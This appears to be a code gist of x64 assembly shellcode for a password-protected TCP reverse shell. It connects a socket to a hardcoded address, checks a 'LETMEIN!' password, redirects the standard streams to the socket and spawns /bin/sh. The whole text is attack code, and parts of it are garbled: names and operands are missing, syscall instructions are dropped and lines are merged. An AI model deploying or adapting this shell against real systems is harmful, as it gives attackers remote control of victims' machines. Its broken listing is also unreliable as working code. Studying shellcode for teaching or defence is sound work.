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Last active January 30, 2020 11:04
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; =================================================
; Password protected x64 TCP Reverse Shell
; Author: Alan Vivona
; =================================================
global _start
; Syscall numbers
syscalls.socket equ 0x29
syscalls.bind equ 0x31
syscalls.listen equ 0x32
syscalls.connect equ 0x2a
syscalls.accept equ 0x2b
syscalls.close equ 0x03
syscalls.dup2 equ 0x21
syscalls.write equ 0x01 equ 0x00
syscalls.execve equ 0x3b
; Constant definitions
ipv4 equ 0x02 ; AF_INET
ipv4.addressLen equ 0x10
tcp equ 0x01 ; SOCK_STREAM
; Standard streams equ 0x00
standardIO.out equ 0x01
standardIO.err equ 0x02
;:> echo -n '//bin/sh' | rev | xxd
;: 00000000: 6873 2f6e 6962 2f2f hs/nib//
binshString equ 0x68732f6e69622f2f
; Configs
config.max_cons equ 0x2
config.password equ 0x4d54454c214e4945 ; MTEL!NIE > LETMEIN! equ 0x100007f5c110002 ; tcp://
; This has nullbytes, so I replaced it with its complement equ 0xfeffff80a3eefffe ; neg(tcp://
section .text
; 1 - Create socket
push syscalls.socket
pop rax
push ipv4
pop rdi
push tcp
pop rsi
mov r15, rax ; save fd into r15
; 2 - Connect to target
xchg rax, rdi
mov rcx,
neg rcx
push rcx
mov rsi, rsp
push ipv4.addressLen
pop rdx
push syscalls.connect
pop rax
; 3 - Read password from the client fd
xor rax, rax ; read syscall == 0x00
mov rdi, r15 ; rdi = fd
push 0x04
pop rdx ; rdx = input size
sub rsp, rdx
mov rsi, rsp ; rsi => buffer
; Check password
mov rax, config.password
mov rdi, rsi
jne read_pass
; 4 - Duplicate std streams
mov rdi, r15 ; restore socket fd into rdi
push 0x02
pop rsi
push syscalls.dup2
pop rax
dec rsi
jns loop_through_stdfs
; 5 - Execve
xor rdx, rdx
push rdx ; First NULL push
mov rbx, binshString ; push /bin//sh in reverse
push rbx ; store /bin//sh address in RDI
mov rdi, rsp
push rdx ; Second NULL push
mov rdx, rsp
push rdi ; set RSI to address of /bin//sh
mov rsi, rsp
push syscalls.execve
pop rax
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